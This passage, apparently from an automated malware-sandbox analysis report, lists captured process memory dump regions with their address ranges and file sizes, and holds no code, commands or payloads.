                                                                                                                                                            • memory/2284-334-0x0000000000AD0000-0x0000000000B42000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              456KB

                                                                                                                                                            • memory/2304-263-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2308-267-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2352-312-0x0000000000100000-0x0000000000141000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              260KB

                                                                                                                                                            • memory/2352-322-0x0000000000150000-0x0000000000162000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              72KB

                                                                                                                                                            • memory/2424-377-0x0000000000400000-0x0000000000454000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              336KB

                                                                                                                                                            • memory/2424-376-0x0000000000250000-0x0000000000259000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              36KB

                                                                                                                                                            • memory/2464-326-0x0000000001E30000-0x0000000001E32000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              8KB

                                                                                                                                                            • memory/2468-225-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2488-265-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2500-262-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2500-226-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2504-260-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2544-259-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2544-306-0x00000000051D0000-0x00000000051D1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/2652-252-0x00000000005B0000-0x0000000000630000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              512KB

                                                                                                                                                            • memory/2652-228-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2668-388-0x00000000049F2000-0x00000000049F3000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/2668-387-0x00000000049F1000-0x00000000049F2000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/2668-380-0x0000000000400000-0x000000000051E000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              1.1MB

                                                                                                                                                            • memory/2668-379-0x0000000000AA0000-0x0000000000B2E000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              568KB

                                                                                                                                                            • memory/2668-268-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2672-264-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2672-305-0x0000000005420000-0x0000000005421000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/2688-332-0x0000000000400000-0x0000000002B9C000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              39.6MB

                                                                                                                                                            • memory/2688-271-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2688-329-0x0000000000240000-0x000000000026F000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              188KB

                                                                                                                                                            • memory/2696-273-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2700-323-0x0000000000500000-0x0000000000502000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              8KB

                                                                                                                                                            • memory/2704-310-0x0000000005370000-0x0000000009985000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              70.1MB

                                                                                                                                                            • memory/2704-327-0x0000000000400000-0x0000000004A15000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              70.1MB

                                                                                                                                                            • memory/2704-270-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2756-337-0x0000000000400000-0x00000000004D7000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              860KB

                                                                                                                                                            • memory/2756-274-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2756-336-0x00000000004E0000-0x00000000005B4000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              848KB

                                                                                                                                                            • memory/2824-230-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2884-320-0x00000000002F0000-0x00000000002F1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/2888-234-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2956-238-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2968-239-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/3008-244-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/3020-335-0x0000000000270000-0x0000000000271000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/3052-246-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/3052-250-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/3140-339-0x00000000006D0000-0x00000000006D2000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              8KB

                                                                                                                                                            • memory/3388-366-0x0000000001F10000-0x0000000002B5A000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              12.3MB

                                                                                                                                                            • memory/3396-363-0x00000000023F0000-0x000000000303A000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              12.3MB

                                                                                                                                                            • memory/3396-362-0x00000000023F0000-0x000000000303A000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              12.3MB